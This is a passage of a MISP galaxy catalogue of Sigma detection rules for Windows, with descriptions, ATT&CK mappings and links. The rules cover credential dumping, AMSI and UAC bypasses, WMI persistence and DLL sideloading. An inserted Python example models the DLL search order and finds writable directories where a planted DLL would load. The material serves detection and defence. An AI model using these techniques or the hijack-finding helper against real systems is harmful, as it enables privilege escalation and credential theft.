Table 9501. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml

Potential Credential Dumping Attempt Using New NetworkProvider - REG

Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Attempt Using New NetworkProvider - REG"

Potential Credential Dumping Attempt Using New NetworkProvider - REG has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 9502. Table References

Links

https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy

https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml

Potential Ransomware Activity Using LegalNotice Message

Detects changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages

The tag is: misp-galaxy:sigma-rules="Potential Ransomware Activity Using LegalNotice Message"

Potential Ransomware Activity Using LegalNotice Message has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"

Table 9503. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_legalnotice_susp_message.yml

Disable Internal Tools or Feature in Registry

Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)

The tag is: misp-galaxy:sigma-rules="Disable Internal Tools or Feature in Registry"

Disable Internal Tools or Feature in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9504. Table References

Links

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md

https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl

https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage

https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml

Potential AMSI COM Server Hijacking

Detects changes to the AMSI COM server registry key in order to disable AMSI scanning functionality. When AMSI attempts to start its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless

The tag is: misp-galaxy:sigma-rules="Potential AMSI COM Server Hijacking"

Potential AMSI COM Server Hijacking has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9505. Table References

Links

https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/

https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml

Register New IFiltre For Persistence

Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files

The tag is: misp-galaxy:sigma-rules="Register New IFiltre For Persistence"

Table 9506. Table References

Links

https://persistence-info.github.io/Data/ifilters.html

https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308

https://twitter.com/0gtweet/status/1468548924600459267

https://github.com/gtworek/PSBits/tree/master/IFilter

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml

VBScript Payload Stored in Registry

Detects VBScript content stored into registry keys as seen being used by UNC2452 group

The tag is: misp-galaxy:sigma-rules="VBScript Payload Stored in Registry"

VBScript Payload Stored in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9507. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml

Potential Persistence Via TypedPaths

Detects modifications or additions to the 'TypedPaths' key in the user or admin registry from a non-standard application, which might indicate a persistence attempt

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via TypedPaths"

Table 9508. Table References

Links

https://forensafe.com/blogs/typedpaths.html

https://twitter.com/dez_/status/1560101453150257154

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml

ServiceDll Hijack

Detects changes to the "ServiceDLL" value related to a service in the registry. This is often used as a method of persistence.

The tag is: misp-galaxy:sigma-rules="ServiceDll Hijack"

ServiceDll Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 9509. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time

https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml

Unsigned Module Loaded by ClickOnce Application

Detects an unsigned module loaded by a ClickOnce application.

The tag is: misp-galaxy:sigma-rules="Unsigned Module Loaded by ClickOnce Application"

Unsigned Module Loaded by ClickOnce Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9510. Table References

Links

https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_clickonce_unsigned_module_loaded.yml

Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded

Detects the load of the dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. Tools like ProcessHacker and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. As an example, the SilentTrinity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.

The tag is: misp-galaxy:sigma-rules="Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded"

Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9511. Table References

Links

https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html

https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6

https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml

WMIC Loading Scripting Libraries

Detects threat actors proxy-executing code and bypassing application controls by leveraging wmic with the /FORMAT switch to download and execute an XSL file containing script (e.g. JScript or VBScript).

The tag is: misp-galaxy:sigma-rules="WMIC Loading Scripting Libraries"

WMIC Loading Scripting Libraries has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

Table 9512. Table References

Links

https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html

https://twitter.com/dez_/status/986614411711442944

https://lolbas-project.github.io/lolbas/Binaries/Wmic/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml

Potential Goopdate.DLL Sideloading

Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe

The tag is: misp-galaxy:sigma-rules="Potential Goopdate.DLL Sideloading"

Potential Goopdate.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9513. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_goopdate.yml

Potential appverifUI.DLL Sideloading

Detects potential DLL sideloading of "appverifUI.dll"

The tag is: misp-galaxy:sigma-rules="Potential appverifUI.DLL Sideloading"

Potential appverifUI.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9514. Table References

Links

https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_appverifui.yml

Potential EACore.DLL Sideloading

Detects potential DLL sideloading of "EACore.dll"

The tag is: misp-galaxy:sigma-rules="Potential EACore.DLL Sideloading"

Potential EACore.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9515. Table References

Links

https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_eacore.yml

Potential 7za.DLL Sideloading

Detects potential DLL sideloading of "7za.dll"

The tag is: misp-galaxy:sigma-rules="Potential 7za.DLL Sideloading"

Potential 7za.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9516. Table References

Links

https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_7za.yml

WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load

Detects the WMI script host process "scrcons.exe" loading scripting DLLs, which could indicate WMI ActiveScriptEventConsumer activity.

The tag is: misp-galaxy:sigma-rules="WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load"

WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9517. Table References

Links

https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html

https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/

https://twitter.com/HunterPlaybook/status/1301207718355759107

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_wmi_scripteventconsumer.yml

Potential DLL Sideloading Via comctl32.dll

Detects potential DLL sideloading using comctl32.dll to obtain SYSTEM privileges.

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Via comctl32.dll"

Potential DLL Sideloading Via comctl32.dll has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9518. Table References

Links

https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt

https://github.com/binderlabs/DirCreate2System

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml

Suspicious WSMAN Provider Image Loads

Detects potential use of the WSMAN provider from uncommon processes, both locally and for remote execution.

The tag is: misp-galaxy:sigma-rules="Suspicious WSMAN Provider Image Loads"

Suspicious WSMAN Provider Image Loads has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 9519. Table References

Links

https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/

https://github.com/bohops/WSMan-WinRM

https://twitter.com/chadtilbury/status/1275851297770610688

https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml

Potential ShellDispatch.DLL Sideloading

Detects potential DLL sideloading of "ShellDispatch.dll"

The tag is: misp-galaxy:sigma-rules="Potential ShellDispatch.DLL Sideloading"

Potential ShellDispatch.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9520. Table References

Links

https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_shelldispatch.yml

Potential RjvPlatform.DLL Sideloading From Default Location

Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary, which can be abused as a method of DLL sideloading since the "$SysReset" directory isn't created by default.

The tag is: misp-galaxy:sigma-rules="Potential RjvPlatform.DLL Sideloading From Default Location"

Potential RjvPlatform.DLL Sideloading From Default Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9521. Table References

Links

https://twitter.com/0gtweet/status/1666716511988330499

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rjvplatform_default_location.yml

Suspicious Volume Shadow Copy Vssapi.dll Load

Detects the image load of the VSS DLL (vssapi.dll) by uncommon executables.

The tag is: misp-galaxy:sigma-rules="Suspicious Volume Shadow Copy Vssapi.dll Load"

Suspicious Volume Shadow Copy Vssapi.dll Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9522. Table References

Links

https://github.com/ORCx41/DeleteShadowCopies

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_vssapi_susp_load.yml

Suspicious Renamed Comsvcs DLL Loaded By Rundll32

Detects rundll32 loading a renamed comsvcs.dll to dump process memory

The tag is: misp-galaxy:sigma-rules="Suspicious Renamed Comsvcs DLL Loaded By Rundll32"

Suspicious Renamed Comsvcs DLL Loaded By Rundll32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9523. Table References

Links

https://twitter.com/sbousseaden/status/1555200155351228419

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml

UAC Bypass With Fake DLL

Detects attempts to load dismcore.dll after dropping it, a technique used to bypass UAC.

The tag is: misp-galaxy:sigma-rules="UAC Bypass With Fake DLL"

UAC Bypass With Fake DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9524. Table References

Links

https://steemit.com/utopian-io/@ah101/uac-bypassing-utility

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml

UAC Bypass Using Iscsicpl - ImageLoad

Detects the "iscsicpl.exe" UAC bypass technique, which leverages DLL search order hijacking to load a custom DLL from a temporary directory or any other user-controlled location on the user's %PATH%.

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Iscsicpl - ImageLoad"

UAC Bypass Using Iscsicpl - ImageLoad has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9525. Table References

Links

https://twitter.com/wdormann/status/1547583317410607110

https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml

Potential Wazuh Security Platform DLL Sideloading

Detects potential DLL side loading of DLLs that are part of the Wazuh security platform

The tag is: misp-galaxy:sigma-rules="Potential Wazuh Security Platform DLL Sideloading"

Potential Wazuh Security Platform DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9526. Table References

Links

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_wazuh.yml

Potential Vivaldi_elf.DLL Sideloading

Detects potential DLL sideloading of "vivaldi_elf.dll"

The tag is: misp-galaxy:sigma-rules="Potential Vivaldi_elf.DLL Sideloading"

Potential Vivaldi_elf.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9527. Table References

Links

https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vivaldi_elf.yml

Potential Rcdll.DLL Sideloading

Detects potential DLL sideloading of rcdll.dll

The tag is: misp-galaxy:sigma-rules="Potential Rcdll.DLL Sideloading"

Potential Rcdll.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9528. Table References

Links

https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_rcdll.yml

HackTool - SharpEvtMute DLL Load

Detects the load of EvtMuteHook.dll, a key component of SharpEvtMute, a tool that tampers with the Windows event logs.

The tag is: misp-galaxy:sigma-rules="HackTool - SharpEvtMute DLL Load"

HackTool - SharpEvtMute DLL Load has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9529. Table References

Links

https://github.com/bats3c/EvtMute

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_hktl_sharpevtmute.yml

Fax Service DLL Search Order Hijack

Detects the Fax service attempting to load ualapi.dll, which does not exist by default. An attacker can plant a malicious DLL of that name and have the service (side)load it.

The tag is: misp-galaxy:sigma-rules="Fax Service DLL Search Order Hijack"

Fax Service DLL Search Order Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9530. Table References

Links

https://windows-internals.com/faxing-your-way-to-system/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_ualapi.yml

Potential SolidPDFCreator.DLL Sideloading

Detects potential DLL sideloading of "SolidPDFCreator.dll"

The tag is: misp-galaxy:sigma-rules="Potential SolidPDFCreator.DLL Sideloading"

Potential SolidPDFCreator.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9531. Table References

Links

https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_solidpdfcreator.yml

Unsigned DLL Loaded by RunDLL32/RegSvr32

Detects RunDLL32/RegSvr32 loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code.

The tag is: misp-galaxy:sigma-rules="Unsigned DLL Loaded by RunDLL32/RegSvr32"

Unsigned DLL Loaded by RunDLL32/RegSvr32 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 9532. Table References

Links

https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql

https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true

https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_unsigned_dll.yml

WMI Persistence - Command Line Event Consumer

Detects WMI command-line event consumers (CommandLineEventConsumer).

The tag is: misp-galaxy:sigma-rules="WMI Persistence - Command Line Event Consumer"

WMI Persistence - Command Line Event Consumer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9533. Table References

Links

https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_persistence_commandline_event_consumer.yml

Unsigned Mfdetours.DLL Sideloading

Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.

The tag is: misp-galaxy:sigma-rules="Unsigned Mfdetours.DLL Sideloading"

Unsigned Mfdetours.DLL Sideloading has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9534. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_mfdetours_unsigned.yml

VMGuestLib DLL Sideload

Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.

The tag is: misp-galaxy:sigma-rules="VMGuestLib DLL Sideload"

VMGuestLib DLL Sideload has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9535. Table References

Links

https://decoded.avast.io/martinchlumecky/png-steganography/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml

Potential DLL Sideloading Of Non-Existent DLLs From System Folders

Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation.

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Of Non-Existent DLLs From System Folders"

Potential DLL Sideloading Of Non-Existent DLLs From System Folders has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9536. Table References

Links

https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/

https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992

https://github.com/Wh04m1001/SysmonEoP

https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/

https://decoded.avast.io/martinchlumecky/png-steganography/

http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml
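The Fax service (ualapi.dll), the iscsicpl %PATH% case and the non-existent system DLL entries above all come down to the same loader behaviour: when a DLL is requested by bare name and is not a KnownDLL, Windows walks a fixed list of directories and takes the first match, so a missing DLL, or a writable directory earlier in the list than the genuine copy, is a hijack. The following is an added example written for this page, not from the Sigma rules or MISP; it models the documented search order for desktop applications with SafeDllSearchMode enabled over an in-memory set of files constructed for the example, and "missing.dll" is a hypothetical name.

```python
# Added example, not from the Sigma rules or MISP: a model of the documented Windows DLL
# search order for desktop applications with SafeDllSearchMode enabled, used to reason about
# which directories an attacker can plant a DLL in.  Directory contents are an in-memory set
# constructed for this example, not a real filesystem; KnownDLLs and already-loaded modules,
# which never reach this search, are outside the model.
import ntpath

SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"        # the 16-bit system directory
WINDIR = r"C:\Windows"


def _norm(path: str) -> str:
    return path.lower().rstrip("\\")


def search_order(app_dir: str, cwd: str, path_dirs: list) -> list:
    """Directories probed, in order, for a DLL given by bare name (duplicates dropped).
    With SafeDllSearchMode on, the current directory comes after the system directories."""
    order = []
    for directory in [app_dir, SYSTEM32, SYSTEM16, WINDIR, cwd, *path_dirs]:
        if _norm(directory) not in {_norm(d) for d in order}:
            order.append(directory)
    return order


def resolve_dll(dll: str, app_dir: str, cwd: str, path_dirs: list, files: set):
    """Full path the loader would pick for `dll`, or None when it exists nowhere on the path."""
    existing = {_norm(f) for f in files}
    for directory in search_order(app_dir, cwd, path_dirs):
        candidate = ntpath.join(directory, dll)
        if _norm(candidate) in existing:
            return candidate
    return None


def hijack_opportunities(dll, app_dir, cwd, path_dirs, files, writable_dirs) -> list:
    """Directories where a DLL written by the attacker would be loaded: every writable
    directory searched before the genuine copy, or every writable directory on the search
    path when the DLL is missing altogether (the ualapi.dll / phantom-DLL case)."""
    genuine = resolve_dll(dll, app_dir, cwd, path_dirs, files)
    writable = {_norm(d) for d in writable_dirs}
    found = []
    for directory in search_order(app_dir, cwd, path_dirs):
        if genuine is not None and _norm(ntpath.join(directory, dll)) == _norm(genuine):
            break                      # the loader stops here; later directories are never probed
        if _norm(directory) in writable:
            found.append(directory)
    return found


# Constructed model.  A default per-user PATH ends with the WindowsApps directory, which a
# standard user can write to; services run with the machine PATH instead.
MACHINE_PATH = [SYSTEM32, WINDIR]
USER_PATH = [SYSTEM32, WINDIR, r"C:\Users\bob\AppData\Local\Microsoft\WindowsApps"]
FILES = {r"C:\Windows\System32\fxssvc.exe", r"C:\Windows\System32\version.dll",
         r"C:\Program Files\App\app.exe"}

if __name__ == "__main__":
    # Fax service: ualapi.dll exists nowhere, so an administrator who can write to System32
    # gets code running as the service (SYSTEM).
    print(hijack_opportunities("ualapi.dll", SYSTEM32, SYSTEM32, MACHINE_PATH, FILES, {SYSTEM32}))
    # Auto-elevating user process loading a missing DLL: any writable directory on the
    # user's search path will do, which is the iscsicpl %PATH% case.
    print(hijack_opportunities("missing.dll", SYSTEM32, r"C:\Users\bob", USER_PATH, FILES,
                               {r"C:\Users\bob", r"C:\Users\bob\AppData\Local\Microsoft\WindowsApps"}))
    # Classic sideloading: version.dll is genuine in System32, but the application directory
    # is searched first, so a writable application directory wins.
    print(hijack_opportunities("version.dll", r"C:\Program Files\App", r"C:\Users\bob", USER_PATH,
                               FILES, {r"C:\Program Files\App", r"C:\Users\bob"}))
```

The third scenario is why most of the "Potential ... DLL Sideloading" rules on this page key on a System32-resident DLL name being loaded from an application directory: the genuine copy in System32 is never reached once a same-named file sits next to the executable.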

Potential DLL Sideloading Of DBGCORE.DLL

Detects DLL sideloading of "dbgcore.dll"

The tag is: misp-galaxy:sigma-rules="Potential DLL Sideloading Of DBGCORE.DLL"

Potential DLL Sideloading Of DBGCORE.DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

